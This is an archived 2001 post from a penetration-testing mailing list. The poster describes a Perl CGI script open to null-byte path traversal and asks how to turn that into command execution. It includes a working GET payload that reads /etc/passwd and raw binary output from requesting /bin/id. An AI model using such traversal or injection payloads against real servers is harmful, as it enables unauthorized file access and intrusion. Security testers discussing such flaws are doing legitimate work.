Penetration Testing mailing list archives
vulnerable perl script?
From: otaner () gmx ch
Date: Thu, 18 Oct 2001 19:07:27 +0200 (MEST)
Hi, I'm doing a pen test and I found a perl script, which seems to be vulnerable. If I do a get, for example: GET /cgi-bin/whatever.pl?variable1=test%00&variable2=../../../../../../etc/passwd%00 I can see the content of the passwd file. But when I try to execute a command, for example: GET /cgi-bin/whatever.pl?variable1=test%00&variable2=../../../../../../bin/id%00 I get this garbage and some interesting stuff: ELF t4P4 (44 ÔééììvÈDD¨/usr/lib/ld.so.15HF$<#%C!-5AD,E0@2:(G8'4>3?;+B9&)*1/6= ".7Ôèäd $ < T t ¼ ô , 0 °Œ¸4getopt_startgetpwuid_environ_end_iob_ex_register__flsbuf_GLOBAL_OFFSET_TABLE_geteuidatexitexitgettext_inittextdomainsetgrentgetuidgetpwnam___Argvsetbuf_DYNAMICgetgrentprintf__iobsetlocale_exit_ex_deregisterenvironperror__cg89_usedgetgrgid__cg92_usedgetegid__fnonstd_usedoptindstrcmp_edata_PROCEDURE_LINKAGE_TABLE___fsr_init_valuegetgroups_etext_lib_versiongetgidmain__environ_lock_finifprintfendgrentlibc.so.1SUNW_1.1libc.so.1Á ='‘Ëð2ìp/°: ... more garbage .... `¿ÿô€§@@@º€2€ ¢`€¦ ü€¤€ŸÄÇàèSUNW_OST_OSCMDaid: invalid user name: "%s" getgroupsgetgroups groups=%u(%s)Usage: id [user] id -a [user] %s%u%s%u%s=%u(%s)(%s)D00¿ÿó<0¿ÿðH0¿ÿíT0¿ÿê`0¿ÿçl0¿ÿäx0¿ÿá„0¿ÿÞ T $P ÿþó€ÿþý8ÿþüÈÿþý8uid euid gid egid@(#)SunOS 5.7 Generic October 1998.interp.hash.dynsym.dynstr.SUNW_version.rela.ex_shared.rela.bss.rela.plt.text.init.fini.exception_ranges.rodata.rodata1.got.plt.dynamic.ex_shared.data.data1.bss.comment.shstrtabÔÔ èèü ää€ddžoÿÿþ - $ I'm not sure but I think, the %00 is the problem and without %00, I get no results. Does anybody know how I can execute my commands? I tried ; and ¦, but nothing happened. I'm not able to see the source of the perl file. any help would be appreciated otaner -- GMX - Die Kommunikationsplattform im Internet. http://www.gmx.net ---------------------------------------------------------------------------- This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service. For more information on SecurityFocus' SIA service which automatically alerts you to the latest security vulnerabilities please see: https://alerts.securityfocus.com/
Current thread:
- vulnerable perl script? otaner (Oct 18)